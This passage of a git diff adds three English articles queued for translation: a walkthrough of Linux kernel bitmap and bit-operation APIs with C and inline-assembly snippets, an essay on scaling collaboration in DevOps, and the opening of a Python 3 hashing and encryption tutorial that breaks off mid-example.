+[5]: https://github.com/alexellis/pi_zero_stock
+[6]: http://stockalert.alexellis.io/
+
diff --git a/sources/tech/20160512 Bitmap in Linux Kernel.md b/sources/tech/20160512 Bitmap in Linux Kernel.md
new file mode 100644
index 0000000000..06297fa204
--- /dev/null
+++ b/sources/tech/20160512 Bitmap in Linux Kernel.md
@@ -0,0 +1,398 @@
+[Translating By cposture 20160520]
+Data Structures in the Linux Kernel
+================================================================================
+
+Bit arrays and bit operations in the Linux kernel
+--------------------------------------------------------------------------------
+
+Besides different [linked](https://en.wikipedia.org/wiki/Linked_data_structure) and [tree](https://en.wikipedia.org/wiki/Tree_%28data_structure%29) based data structures, the Linux kernel provides an [API](https://en.wikipedia.org/wiki/Application_programming_interface) for [bit arrays](https://en.wikipedia.org/wiki/Bit_array), or `bitmap`s. Bit arrays are heavily used in the Linux kernel, and the following source code files contain the common `API` for working with such structures:
+
+* [lib/bitmap.c](https://github.com/torvalds/linux/blob/master/lib/bitmap.c)
+* [include/linux/bitmap.h](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h)
+
+Besides these two files, there is also an architecture-specific header file which provides optimized bit operations for a certain architecture. We consider the [x86_64](https://en.wikipedia.org/wiki/X86-64) architecture, so in our case it will be:
+
+* [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h)
+
+header file. As I just wrote above, the `bitmap` is heavily used in the Linux kernel. For example, a `bit array` is used to store the set of online/offline processors for systems which support [hot-plug](https://www.kernel.org/doc/Documentation/cpu-hotplug.txt) cpu (you can read more about this in the [cpumasks](https://0xax.gitbooks.io/linux-insides/content/Concepts/cpumask.html) part), a `bit array` stores the set of allocated [irqs](https://en.wikipedia.org/wiki/Interrupt_request_%28PC_architecture%29) during initialization of the Linux kernel, and so on.
+
+So, the main goal of this part is to see how `bit arrays` are implemented in the Linux kernel. Let's start.
+
+Declaration of bit array
+================================================================================
+
+Before we look at the `API` for bitmap manipulation, we must know how to declare one in the Linux kernel. There are two common methods to declare your own bit array. The first simple way is to declare an array of `unsigned long`. For example:
+
+```C
+unsigned long my_bitmap[8];
+```
+
+The second way is to use the `DECLARE_BITMAP` macro which is defined in the [include/linux/types.h](https://github.com/torvalds/linux/blob/master/include/linux/types.h) header file:
+
+```C
+#define DECLARE_BITMAP(name,bits) \
+ unsigned long name[BITS_TO_LONGS(bits)]
+```
+
+We can see that `DECLARE_BITMAP` macro takes two parameters:
+
+* `name` - name of bitmap;
+* `bits` - amount of bits in bitmap;
+
+and just expands to the definition of an `unsigned long` array with `BITS_TO_LONGS(bits)` elements, where the `BITS_TO_LONGS` macro converts a given number of bits to a number of `longs`, or in other words it calculates how many 8-byte elements are needed to hold `bits` bits:
+
+```C
+#define BITS_PER_BYTE 8
+#define DIV_ROUND_UP(n,d) (((n) + (d) - 1) / (d))
+#define BITS_TO_LONGS(nr) DIV_ROUND_UP(nr, BITS_PER_BYTE * sizeof(long))
+```
+
+So, for example `DECLARE_BITMAP(my_bitmap, 64)` will produce:
+
+```python
+>>> (((64) + (64) - 1) / (64))
+1
+```
+
+and:
+
+```C
+unsigned long my_bitmap[1];
+```
+
+After we are able to declare a bit array, we can start to use it.
+
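+Before we turn to the kernel's helpers, here is a short userspace sketch (not kernel code) of how a bit number maps onto the underlying `unsigned long` array; this is the same index arithmetic the kernel's helpers perform internally (assuming a 64-bit `unsigned long`):
+
+```C
+#include <stdio.h>
+
+#define BITS_PER_LONG (8 * sizeof(unsigned long))
+
+int main(void)
+{
+    unsigned long my_bitmap[2] = { 0 };  /* room for 128 bits */
+
+    /* set bit 70: it lives in word 70 / 64 = 1, at position 70 % 64 = 6 */
+    my_bitmap[70 / BITS_PER_LONG] |= 1UL << (70 % BITS_PER_LONG);
+
+    /* test bit 70: prints 1 */
+    printf("%d\n", !!(my_bitmap[70 / BITS_PER_LONG] & (1UL << (70 % BITS_PER_LONG))));
+    return 0;
+}
+```
+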
+Architecture-specific bit operations
+================================================================================
+
+We already saw above a couple of source code and header files which provide an [API](https://en.wikipedia.org/wiki/Application_programming_interface) for the manipulation of bit arrays. The most important and widely used API of bit arrays is architecture-specific and located, as we already know, in the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file.
+
+First of all let's look at the two most important functions:
+
+* `set_bit`;
+* `clear_bit`.
+
+I think there is no need to explain what these functions do; that must already be clear from their names. Let's look at their implementation. If you look into the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file, you will note that each of these functions is represented by two variants: [atomic](https://en.wikipedia.org/wiki/Linearizability) and non-atomic. Before we start to dive into the implementations of these functions, we first must know a little about `atomic` operations.
+
+In simple words, atomic operations guarantee that two or more operations will not be performed on the same data concurrently. The `x86` architecture provides a set of atomic instructions, for example the [xchg](http://x86.renejeschke.de/html/file_module_x86_id_328.html) and [cmpxchg](http://x86.renejeschke.de/html/file_module_x86_id_41.html) instructions. Besides atomic instructions, some non-atomic instructions can be made atomic with the help of the [lock](http://x86.renejeschke.de/html/file_module_x86_id_159.html) prefix. That is enough about atomic operations for now, so we can begin to consider the implementation of the `set_bit` and `clear_bit` functions.
+
+First of all, let's consider the `non-atomic` variants of these functions. The names of the non-atomic `set_bit` and `clear_bit` start with a double underscore. As we already know, all of these functions are defined in the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file; the first is `__set_bit`:
+
+```C
+static inline void __set_bit(long nr, volatile unsigned long *addr)
+{
+ asm volatile("bts %1,%0" : ADDR : "Ir" (nr) : "memory");
+}
+```
+
+As we can see, it takes two arguments:
+
+* `nr` - the number of the bit in the bit array;
+* `addr` - the address of the bit array in which we need to set the bit.
+
+Note that the `addr` parameter is declared with the `volatile` keyword, which tells the compiler that the value at the given address may change. The implementation of `__set_bit` is pretty simple: it consists of a single line of [inline assembler](https://en.wikipedia.org/wiki/Inline_assembler) code. We use the [bts](http://x86.renejeschke.de/html/file_module_x86_id_25.html) instruction, which selects the bit specified by the first operand (`nr` in our case) from the bit array, stores the value of the selected bit in the [CF](https://en.wikipedia.org/wiki/FLAGS_register) flag of the flags register and then sets this bit.
+
+Note that we can see the usage of `nr`, but `addr` does not appear explicitly. You might already guess that the secret is in `ADDR`: it is a macro defined in the same header file which expands to a string containing the value of the given address with the `+m` constraint:
+
+```C
+#define ADDR BITOP_ADDR(addr)
+#define BITOP_ADDR(x) "+m" (*(volatile long *) (x))
+```
+
+Besides the `+m`, we can see other constraints in the `__set_bit` function. Let's look at them and try to understand what they mean:
+
+* `+m` - represents a memory operand, where `+` indicates that the given operand is both read and written;
+* `I` - represents an integer constant;
+* `r` - represents a register operand.
+
+Besides these constraints, we can also see the `memory` clobber, which tells the compiler that this code changes values in memory. That's all. Now let's look at the same function in its `atomic` variant. It looks more complex than its `non-atomic` counterpart:
+
+```C
+static __always_inline void
+set_bit(long nr, volatile unsigned long *addr)
+{
+ if (IS_IMMEDIATE(nr)) {
+ asm volatile(LOCK_PREFIX "orb %1,%0"
+ : CONST_MASK_ADDR(nr, addr)
+ : "iq" ((u8)CONST_MASK(nr))
+ : "memory");
+ } else {
+ asm volatile(LOCK_PREFIX "bts %1,%0"
+ : BITOP_ADDR(addr) : "Ir" (nr) : "memory");
+ }
+}
+```
+
+First of all, note that this function takes the same set of parameters as `__set_bit`, but is additionally marked with the `__always_inline` attribute. `__always_inline` is a macro defined in [include/linux/compiler-gcc.h](https://github.com/torvalds/linux/blob/master/include/linux/compiler-gcc.h) which just expands to the `always_inline` attribute:
+
+```C
+#define __always_inline inline __attribute__((always_inline))
+```
+
+which means that this function will always be inlined to reduce the size of the Linux kernel image. Now let's try to understand the implementation of the `set_bit` function. It starts by checking the given bit number: the `IS_IMMEDIATE` macro is defined in the same [header](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) file and expands to a call of a built-in [gcc](https://en.wikipedia.org/wiki/GNU_Compiler_Collection) function:
+
+```C
+#define IS_IMMEDIATE(nr) (__builtin_constant_p(nr))
+```
+
+The `__builtin_constant_p` built-in returns `1` if the given parameter is known to be constant at compile time and `0` otherwise. If the bit number is a compile-time constant, there is no need to use the slower `bts` instruction to set the bit: we can simply apply a [bitwise or](https://en.wikipedia.org/wiki/Bitwise_operation#OR) to the byte at the given address which contains the given bit, using a mask in which only the target bit is `1` and all other bits are zero. If the bit number is not a compile-time constant, we do the same as in the `__set_bit` function. The `CONST_MASK_ADDR` macro:
+
+```C
+#define CONST_MASK_ADDR(nr, addr) BITOP_ADDR((void *)(addr) + ((nr)>>3))
+```
+
+expands to the given address plus an offset to the byte which contains the given bit. For example, say we have the address `0x1000` and the bit number `0x9`. Since bit `0x9` lives `one byte + one bit` in, the resulting address is `addr + 1`:
+
+```python
+>>> hex(0x1000 + (0x9 >> 3))
+'0x1001'
+```
+
+The `CONST_MASK` macro turns the given bit number into a byte mask in which only the bit at position `nr & 7` is `1` and all other bits are `0`:
+
+```C
+#define CONST_MASK(nr) (1 << ((nr) & 7))
+```
+
+```python
+>>> bin(1 << (0x9 & 7))
+'0b10'
+```
+
+In the end we just apply a bitwise `or` to these values. So, for example, if the word at our address contains `0x4097` and we need to set bit `0x9` (which, as we computed above, lives in byte `1` of that word):
+
+```python
+>>> bin(0x4097)
+'0b100000010010111'
+>>> bin(((0x4097 >> 8) & 0xff) | (1 << (0x9 & 7)))
+'0b1000010'
+```
+
+the result is the new value of byte `1`: the `ninth` bit of the word is now set.
+
+Note that all of these operations are marked with `LOCK_PREFIX`, which expands to the [lock](http://x86.renejeschke.de/html/file_module_x86_id_159.html) prefix and guarantees the atomicity of the operation.
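+
+Putting the pieces together: for a compile-time constant `nr`, the fast path of `set_bit` is equivalent to the following C sketch (my own illustration, not the kernel's code; the real version additionally prefixes the `orb` with `lock` to make it atomic):
+
+```C
+static inline void set_bit_sketch(long nr, volatile unsigned long *addr)
+{
+	/* the byte that contains bit nr ... */
+	volatile unsigned char *byte = (volatile unsigned char *)addr + (nr >> 3);
+
+	/* ... ORed with a mask that has only bit (nr & 7) set */
+	*byte |= (unsigned char)(1 << (nr & 7));
+}
+```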
+
+As we already know, besides the `set_bit` and `__set_bit` operations, the Linux kernel provides two inverse functions to clear a bit in atomic and non-atomic context: `clear_bit` and `__clear_bit`. Both are defined in the same [header file](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) and take the same set of arguments. And it is not only the arguments that are similar: generally these functions are very close to `set_bit` and `__set_bit`. Let's look at the implementation of the non-atomic `__clear_bit` function:
+
+```C
+static inline void __clear_bit(long nr, volatile unsigned long *addr)
+{
+ asm volatile("btr %1,%0" : ADDR : "Ir" (nr));
+}
+```
+
+Yes, as we can see, it takes the same set of arguments and contains a very similar block of inline assembler; it just uses the [btr](http://x86.renejeschke.de/html/file_module_x86_id_24.html) instruction instead of `bts`. As the function's name suggests, it clears the given bit at the given address. The `btr` instruction acts like `bts`: it selects the bit specified by the first operand, stores its value in the `CF` flag and then clears this bit in the bit array specified by the second operand.
+
+The atomic variant of the `__clear_bit` is `clear_bit`:
+
+```C
+static __always_inline void
+clear_bit(long nr, volatile unsigned long *addr)
+{
+ if (IS_IMMEDIATE(nr)) {
+ asm volatile(LOCK_PREFIX "andb %1,%0"
+ : CONST_MASK_ADDR(nr, addr)
+ : "iq" ((u8)~CONST_MASK(nr)));
+ } else {
+ asm volatile(LOCK_PREFIX "btr %1,%0"
+ : BITOP_ADDR(addr)
+ : "Ir" (nr));
+ }
+}
+```
+
+and as we can see it is very similar to `set_bit`, with just two differences. First, it uses the `btr` instruction to clear the bit where `set_bit` uses `bts` to set it. Second, it uses a negated mask and the `and` instruction to clear the bit in the given byte where `set_bit` uses `or`.
+
+That's all. Now we can set and clear a bit in any bit array, and we can move on to other operations on bitmasks.
+
+Setting and clearing bits are the most widely used operations on bit arrays in the Linux kernel, but there are other useful operations too. One more widely used operation is checking whether a given bit in a bit array is set. We can do this with the help of the `test_bit` macro, which is defined in the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file and expands to a call of either `constant_test_bit` or `variable_test_bit`, depending on the bit number:
+
+```C
+#define test_bit(nr, addr) \
+ (__builtin_constant_p((nr)) \
+ ? constant_test_bit((nr), (addr)) \
+ : variable_test_bit((nr), (addr)))
+```
+
+So, if `nr` is known to be a compile-time constant, `test_bit` expands to a call of the `constant_test_bit` function, and to `variable_test_bit` otherwise. Now let's look at the implementations of these functions, starting with `variable_test_bit`:
+
+```C
+static inline int variable_test_bit(long nr, volatile const unsigned long *addr)
+{
+ int oldbit;
+
+ asm volatile("bt %2,%1\n\t"
+ "sbb %0,%0"
+ : "=r" (oldbit)
+ : "m" (*(unsigned long *)addr), "Ir" (nr));
+
+ return oldbit;
+}
+```
+
+The `variable_test_bit` function takes a similar set of arguments to `set_bit` and the other functions. We can also see inline assembly here, which executes the [bt](http://x86.renejeschke.de/html/file_module_x86_id_22.html) and [sbb](http://x86.renejeschke.de/html/file_module_x86_id_286.html) instructions. The `bt` (bit test) instruction selects the bit specified by the first operand from the bit array specified by the second operand and stores its value in the [CF](https://en.wikipedia.org/wiki/FLAGS_register) bit of the flags register. The `sbb` instruction then subtracts its source operand plus the value of `CF` from its destination operand; since both operands here are `oldbit`, `sbb %0,%0` computes `oldbit - oldbit - CF = -CF` and writes the result to `oldbit`, so `oldbit` ends up `0` if the given bit was clear and `-1` (all ones) if it was set.
+
+The `constant_test_bit` function does the same as we already saw in `set_bit`:
+
+```C
+static __always_inline int constant_test_bit(long nr, const volatile unsigned long *addr)
+{
+ return ((1UL << (nr & (BITS_PER_LONG-1))) &
+ (addr[nr >> _BITOPS_LONG_SHIFT])) != 0;
+}
+```
+
+It generates a `long`-wide mask in which only the bit at position `nr % BITS_PER_LONG` is `1` (similar in spirit to `CONST_MASK`) and applies a bitwise [and](https://en.wikipedia.org/wiki/Bitwise_operation#AND) to the `long` word which contains the given bit.
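+
+As a quick standalone illustration (the values are arbitrary; on `x86_64`, `BITS_PER_LONG` is `64` and `_BITOPS_LONG_SHIFT` is `6`), here is the same logic spelled out for bit `14` of a one-word bitmap:
+
+```C
+const unsigned long bits[1] = { 0x4097UL };
+
+/* 14 >> 6 == 0, so we look at bits[0]; 0x4097 has bit 14 set, so r == 1 */
+int r = ((1UL << (14 & 63)) & bits[14 >> 6]) != 0;
+```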
+
+The next widely used bit-array operation is changing (toggling) a bit in a bit array. The Linux kernel provides two helpers for this:
+
+* `__change_bit`;
+* `change_bit`.
+
+As you can already guess, these two variants are atomic and non-atomic, just like `set_bit` and `__set_bit`. To start, let's look at the implementation of the `__change_bit` function:
+
+```C
+static inline void __change_bit(long nr, volatile unsigned long *addr)
+{
+ asm volatile("btc %1,%0" : ADDR : "Ir" (nr));
+}
+```
+
+Pretty easy, isn't it? The implementation of `__change_bit` is the same as `__set_bit`, except that instead of the `bts` instruction we use [btc](http://x86.renejeschke.de/html/file_module_x86_id_23.html). This instruction selects the given bit from the given bit array, stores its value in `CF` and inverts it by applying the complement operation, so a bit with value `1` becomes `0` and vice versa:
+
+```python
+>>> int(not 1)
+0
+>>> int(not 0)
+1
+```
+
+The atomic version of the `__change_bit` is the `change_bit` function:
+
+```C
+static inline void change_bit(long nr, volatile unsigned long *addr)
+{
+ if (IS_IMMEDIATE(nr)) {
+ asm volatile(LOCK_PREFIX "xorb %1,%0"
+ : CONST_MASK_ADDR(nr, addr)
+ : "iq" ((u8)CONST_MASK(nr)));
+ } else {
+ asm volatile(LOCK_PREFIX "btc %1,%0"
+ : BITOP_ADDR(addr)
+ : "Ir" (nr));
+ }
+}
+```
+
+It is similar to the `set_bit` function, but with two differences: it uses the `xor` operation instead of `or`, and the `btc` instruction instead of `bts`.
+
+At this point we know the most important architecture-specific operations on bit arrays. Time to look at the generic bitmap API.
+
+Common bit operations
+================================================================================
+
+Besides the architecture-specific API from the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header file, the Linux kernel provides a common API for the manipulation of bit arrays. As we know from the beginning of this part, it can be found in the [include/linux/bitmap.h](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) header file and in the [lib/bitmap.c](https://github.com/torvalds/linux/blob/master/lib/bitmap.c) source code file. But before we get to those, let's look into the [include/linux/bitops.h](https://github.com/torvalds/linux/blob/master/include/linux/bitops.h) header file, which provides a set of useful macros. Let's look at some of them.
+
+First of all, let's look at the following four macros:
+
+* `for_each_set_bit`
+* `for_each_set_bit_from`
+* `for_each_clear_bit`
+* `for_each_clear_bit_from`
+
+All of these macros provide an iterator over a certain set of bits in a bit array. The first macro iterates over the bits which are set, the second does the same but starts from a given bit. The last two macros do the same for clear bits. Let's look at the implementation of the `for_each_set_bit` macro:
+
+```C
+#define for_each_set_bit(bit, addr, size) \
+ for ((bit) = find_first_bit((addr), (size)); \
+ (bit) < (size); \
+ (bit) = find_next_bit((addr), (size), (bit) + 1))
+```
+
+As we can see, it takes three arguments and expands to a loop that starts from the first set bit, returned by the `find_first_bit` function, and continues to the next set bit via `find_next_bit` while the bit number is less than the given size.
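+
+A small kernel-context usage sketch (the bitmap contents and the message are illustrative only):
+
+```C
+unsigned long my_bitmap[1] = { 0x4097UL };   /* bits 0, 1, 2, 4, 7 and 14 are set */
+unsigned int bit;
+
+for_each_set_bit(bit, my_bitmap, 64)
+	pr_info("bit %u is set\n", bit);     /* prints 0, 1, 2, 4, 7 and 14 */
+```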
+
+Besides these four macros, the [arch/x86/include/asm/bitops.h](https://github.com/torvalds/linux/blob/master/arch/x86/include/asm/bitops.h) header also provides an API for the rotation of `64-bit` and `32-bit` values, among other things.
+
+The next [header](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) file provides an API for manipulating bit arrays as a whole. For example, it provides two functions:
+
+* `bitmap_zero`;
+* `bitmap_fill`.
+
+to clear a bit array and to fill it with `1`s, respectively. Let's look at the implementation of the `bitmap_zero` function:
+
+```C
+static inline void bitmap_zero(unsigned long *dst, unsigned int nbits)
+{
+ if (small_const_nbits(nbits))
+ *dst = 0UL;
+ else {
+ unsigned int len = BITS_TO_LONGS(nbits) * sizeof(unsigned long);
+ memset(dst, 0, len);
+ }
+}
+```
+
+First of all, we can see the check on `nbits`. `small_const_nbits` is a macro defined in the same header [file](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h):
+
+```C
+#define small_const_nbits(nbits) \
+ (__builtin_constant_p(nbits) && (nbits) <= BITS_PER_LONG)
+```
+
+As we can see, it checks that `nbits` is a compile-time constant and that its value does not exceed `BITS_PER_LONG`, i.e. `64`. If the number of bits fits into a single `long`, we can just set that one word to zero. Otherwise we calculate how many `long` values our bit array occupies and clear them with [memset](http://man7.org/linux/man-pages/man3/memset.3.html).
+
+The implementation of the `bitmap_fill` function is similar to that of the `bitmap_zero` function, except that we fill the given bit array with `0xff` bytes (`0b11111111`):
+
+```C
+static inline void bitmap_fill(unsigned long *dst, unsigned int nbits)
+{
+ unsigned int nlongs = BITS_TO_LONGS(nbits);
+ if (!small_const_nbits(nbits)) {
+ unsigned int len = (nlongs - 1) * sizeof(unsigned long);
+ memset(dst, 0xff, len);
+ }
+ dst[nlongs - 1] = BITMAP_LAST_WORD_MASK(nbits);
+}
+```
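+
+Note the final assignment: `BITMAP_LAST_WORD_MASK(nbits)` produces a mask with only the low `nbits % BITS_PER_LONG` bits set (or all bits set when `nbits` is a multiple of `BITS_PER_LONG`), so the bits past `nbits` in the last word stay zero. A sketch of its usual definition in the same header file:
+
+```C
+#define BITMAP_LAST_WORD_MASK(nbits) (~0UL >> (-(nbits) & (BITS_PER_LONG - 1)))
+
+/* BITMAP_LAST_WORD_MASK(70) == 0x3f: only bits 64..69 of the last word get filled */
+```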
+
+Besides the `bitmap_fill` and `bitmap_zero` functions, the [include/linux/bitmap.h](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) header file provides `bitmap_copy`, which is similar to `bitmap_zero` but uses [memcpy](http://man7.org/linux/man-pages/man3/memcpy.3.html) instead of [memset](http://man7.org/linux/man-pages/man3/memset.3.html). It also provides bitwise operations on bit arrays such as `bitmap_and`, `bitmap_or`, `bitmap_xor`, etc. We will not go through the implementation of these functions, because they are easy to understand if you have followed everything in this part. If you are interested in how these functions are implemented, open the [include/linux/bitmap.h](https://github.com/torvalds/linux/blob/master/include/linux/bitmap.h) header file and start exploring.
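+
+As a taste of that API, here is a minimal sketch combining two bitmaps with the generic helpers (all names and sizes are illustrative):
+
+```C
+DECLARE_BITMAP(a, 64);
+DECLARE_BITMAP(b, 64);
+DECLARE_BITMAP(dst, 64);
+
+bitmap_fill(a, 64);          /* a: all 64 bits set */
+bitmap_zero(b, 64);
+set_bit(3, b);               /* b: only bit 3 set */
+
+bitmap_and(dst, a, b, 64);   /* dst = a & b -> only bit 3 set */
+```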
+
+That's all.
+
+Links
+================================================================================
+
+* [bitmap](https://en.wikipedia.org/wiki/Bit_array)
+* [linked data structures](https://en.wikipedia.org/wiki/Linked_data_structure)
+* [tree data structures](https://en.wikipedia.org/wiki/Tree_%28data_structure%29)
+* [hot-plug](https://www.kernel.org/doc/Documentation/cpu-hotplug.txt)
+* [cpumasks](https://0xax.gitbooks.io/linux-insides/content/Concepts/cpumask.html)
+* [IRQs](https://en.wikipedia.org/wiki/Interrupt_request_%28PC_architecture%29)
+* [API](https://en.wikipedia.org/wiki/Application_programming_interface)
+* [atomic operations](https://en.wikipedia.org/wiki/Linearizability)
+* [xchg instruction](http://x86.renejeschke.de/html/file_module_x86_id_328.html)
+* [cmpxchg instruction](http://x86.renejeschke.de/html/file_module_x86_id_41.html)
+* [lock instruction](http://x86.renejeschke.de/html/file_module_x86_id_159.html)
+* [bts instruction](http://x86.renejeschke.de/html/file_module_x86_id_25.html)
+* [btr instruction](http://x86.renejeschke.de/html/file_module_x86_id_24.html)
+* [bt instruction](http://x86.renejeschke.de/html/file_module_x86_id_22.html)
+* [sbb instruction](http://x86.renejeschke.de/html/file_module_x86_id_286.html)
+* [btc instruction](http://x86.renejeschke.de/html/file_module_x86_id_23.html)
+* [man memcpy](http://man7.org/linux/man-pages/man3/memcpy.3.html)
+* [man memset](http://man7.org/linux/man-pages/man3/memset.3.html)
+* [CF](https://en.wikipedia.org/wiki/FLAGS_register)
+* [inline assembler](https://en.wikipedia.org/wiki/Inline_assembler)
+* [gcc](https://en.wikipedia.org/wiki/GNU_Compiler_Collection)
+
+
+------------------------------------------------------------------------------
+
+via: https://github.com/0xAX/linux-insides/blob/master/DataStructures/bitmap.md
+
+作者:[0xAX][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://twitter.com/0xAX
diff --git a/sources/tech/20160516 Scaling Collaboration in DevOps.md b/sources/tech/20160516 Scaling Collaboration in DevOps.md
new file mode 100644
index 0000000000..bee9ab5415
--- /dev/null
+++ b/sources/tech/20160516 Scaling Collaboration in DevOps.md
@@ -0,0 +1,68 @@
+Translating by Bestony
+Scaling Collaboration in DevOps
+=================================
+
+![](http://devops.com/wp-content/uploads/2016/05/ScalingCollaboration.jpg)
+
+Those familiar with DevOps generally agree that it is as much about culture as it is about technology. There are certainly tools and practices involved in the effective implementation of DevOps, but the foundation of DevOps success is how well [teams and individuals collaborate][1] across the enterprise to get things done more rapidly, efficiently and effectively.
+
+Most DevOps platforms and tools are designed with scalability in mind. DevOps environments often run in the cloud and tend to be volatile. It’s important for the software that supports DevOps to be able to scale in real time to address spikes and lulls in demand. The same thing is true for the human element as well, but scaling collaboration is a whole different story.
+
+Collaboration across the enterprise is critical for DevOps success. Great code and development needs to make it over the finish line to production to benefit customers. The challenge organizations face is how to do that seamlessly and with as much speed and automation as possible without sacrificing quality or performance. How can businesses streamline code development and deployment, while maintaining visibility, governance and compliance?
+
+### Emerging Trends
+
+First, I want to provide some background and share some data gathered by 451 Research on DevOps and DevOps adoption in general. Cloud, agile and DevOps capabilities are important for organizations today—both in perception and reality. 451 sees enterprise adoption of these things, as well as container technologies, growing—including increased usage in production environments.
+
+There are a number of advantages to embracing these technologies and methodologies, such as increased flexibility and speed, reduction of costs, improvements in resilience and reliability, and fitness for new or emerging applications. According to 451 Research, organizations also face some barriers including a lack of familiarity and required skills internally, the immaturity of these emerging technologies, and cost and security concerns.
+
+In the “[Voice of the Enterprise: SDI Q4 2015 survey][2],” 451 Research found that more than half of the respondents (51.7 percent) consider themselves to be late adopters, or even the last adopters of new technology. The flip side of that is that almost half (48.3 percent) label themselves as first or early adopters.
+
+Those general sentiments are reflected in the survey responses to other questions. When asked about implementation of containers, 50.3 percent stated it is not in their plans at all, while the remaining 49.7 percent are in some state of planning, pilot or active use of container technologies. Nearly two-thirds (65.1 percent) indicated that they use agile development methodologies for application development, but only 39.6 percent responded that they’ve embraced DevOps approaches. Nevertheless, while agile software development has been in the industry for years, 451 notes the impressive adoption of containers and DevOps, given they are emergent trends.
+
+When asked what the top three IT pain points are, the leading responses were cost or budget, insufficient staff and legacy software issues. As organizations move to cloud, DevOps and containers, issues such as these will need to be addressed, along with how to scale both technologies and collaboration effectively.
+
+### The Current State
+
+The industry—driven in large part by the DevOps revolution—is in the midst of a sea change, where software development is becoming more highly integrated across the entire business. The creation of software is less segregated and is more and more a function of collaboration and socialization.
+
+Concepts and methodologies that were novel or niche just a few years ago have matured quickly to become the mainstream technologies and frameworks that are driving value today. Businesses rely on concepts such as agile, lean, virtualization, cloud, automation and microservices to streamline development and enable them to work more effectively and efficiently at the same time.
+
+To adapt and evolve, enterprises need to accomplish a number of key tasks. The challenge companies face today is how to accelerate development while reducing costs. Organizations need to eliminate the barriers that exist between IT and the rest of the business, and work cooperatively toward a strategy that provides more effectiveness in a technology-driven, competitive environment.
+
+Agile, cloud, DevOps and containers all play a role in that process, but the one thing that binds it all is effective collaboration. Each of these technologies and methodologies provides unique benefits, but the real value comes from the organization as a whole—and the tools and platforms used by the organization—being able to collaborate at scale. Successful DevOps implementations also require participation from other stakeholders beyond development and IT operations teams, including security, database, storage and line-of-business teams.
+
+### Collaboration-as-a-Platform
+
+There are services and platforms online—such as GitHub—that facilitate and streamline collaboration. The online platform functions as a code repository, but the value extends beyond just providing a place to store code.
+
+Such a [collaboration platform][4] helps developers and teams collaborate more effectively because it provides a community where the code and process can be shared and discussed. Managers can monitor progress and track what code is shipping next. Developers can experiment with new ideas in a safe environment before taking those experiments to a live production environment, and new ideas and experiments can be effectively communicated to the appropriate teams.
+
+One of the keys to more agile development and DevOps is to allow developers to test things and gather relevant feedback quickly. The goal is to produce quality code and features faster, not to waste time setting up and managing infrastructure or scheduling more meetings to talk about it. The GitHub platform, for example, enables more effective and scalable collaboration because code review can occur when it is most convenient for the participants. There is no need to try and coordinate and schedule code review meetings, so the developers can continue to work uninterrupted, resulting in greater productivity and job satisfaction.
+
+Steven Anderson of Sendachi noted that GitHub is a collaboration platform, but it’s also a place for your tools to work with you, too. This means it can help not only with collaboration and continuous integration, but also with code quality.
+
+One of the benefits of a collaboration platform is that large teams of developers can be broken down into smaller teams that can focus more efficiently on specific components. It also allows things such as document sharing alongside code development to blur the lines between technical and non-technical contributions and enable increased collaboration and visibility.
+
+### Collaboration is Key
+
+The importance of collaboration can’t be stressed enough. It is a key tenet of DevOps culture, and it’s vital to agile development and maintaining a competitive edge in today’s world. Executive or management support and internal evangelism are important. Organizations also need to embrace the culture shift—blending skills across functional areas toward a common goal.
+
+With that culture established, though, effective collaboration is crucial. A collaboration platform is an essential element of collaborating at scale because it streamlines productivity and reduces redundancy and effort, and yields higher quality results at the same time.
+
+
+--------------------------------------------------------------------------------
+
+via: http://devops.com/2016/05/16/scaling-collaboration-devops/
+
+作者:[TONY BRADLEY][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://devops.com/author/tonybsg/
+[1]: http://devops.com/2014/12/15/four-strategies-supporting-devops-collaboration/
+[2]: https://451research.com/
+[3]: https://451research.com/customer-insight-voice-of-the-enterprise-overview
+[4]: http://devops.com/events/analytics-of-collaboration-on-github/
diff --git a/sources/tech/20160518 Python 3: An Intro to Encryption.md b/sources/tech/20160518 Python 3: An Intro to Encryption.md
new file mode 100644
index 0000000000..f80702a771
--- /dev/null
+++ b/sources/tech/20160518 Python 3: An Intro to Encryption.md
@@ -0,0 +1,279 @@
+[Translating by cposture]
+Python 3: An Intro to Encryption
+===================================
+
+Python 3 doesn’t have very much in its standard library that deals with encryption. Instead, you get hashing libraries. We’ll take a brief look at those in this chapter, but the primary focus will be on the following 3rd party packages: PyCrypto and cryptography. We will learn how to encrypt and decrypt strings with both of these libraries.
+
+---
+
+### Hashing
+
+If you need secure hashes or message digest algorithms, then Python’s standard library has you covered in the **hashlib** module. It includes the FIPS secure hash algorithms SHA1, SHA224, SHA256, SHA384, and SHA512 as well as RSA’s MD5 algorithm. Python also supports the adler32 and crc32 hash functions, but those are in the **zlib** module.
+
+One of the most popular uses of hashes is storing the hash of a password instead of the password itself. Of course, the hash has to be a good one or it can be decrypted. Another popular use case for hashes is to hash a file and then send the file and its hash separately. Then the person receiving the file can run a hash on the file to see if it matches the hash that was sent. If it does, then that means no one has changed the file in transit.
+
+
+Let’s try creating an md5 hash:
+
+```
+>>> import hashlib
+>>> md5 = hashlib.md5()
+>>> md5.update('Python rocks!')
+Traceback (most recent call last):
+ File "", line 1, in
+ md5.update('Python rocks!')
